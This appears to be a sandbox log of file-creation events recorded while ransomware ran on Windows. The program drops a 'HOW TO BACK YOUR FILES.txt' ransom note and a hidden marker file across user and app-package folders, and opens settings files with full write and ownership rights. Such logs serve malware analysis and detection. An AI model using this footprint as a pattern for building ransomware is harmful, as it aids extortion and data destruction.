Create C:\Users\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\LocalState\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\LocalCache\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\LocalCache\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\AppData\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\AppData\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\AC\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\AC\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\TempState\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\TempState\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\SystemAppData\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\SystemAppData\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\roaming.lock desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\settings.dat desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\settings.dat.LOG1 desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\settings.dat.LOG2 desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\RoamingState\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\RoamingState\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\LocalState\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\LocalState\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\LocalCache\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\LocalCache\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\AppData\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\AppData\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\AC\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\Windows.MiracastView_cw5n1h2txyewy\AC\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\PYCtA9-TE0M\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\TempState\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\TempState\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\SystemAppData\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\SystemAppData\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\PYCtA9-TE0M\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\roaming.lock desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.dat desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.dat.LOG1 desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.dat.LOG2 desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\RoamingState\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\RoamingState\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_Proxy_Automatic_Config_Group.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupAppSizesList.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupAutoplayDefaults.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupFamilyUsers.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupInputMouse.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
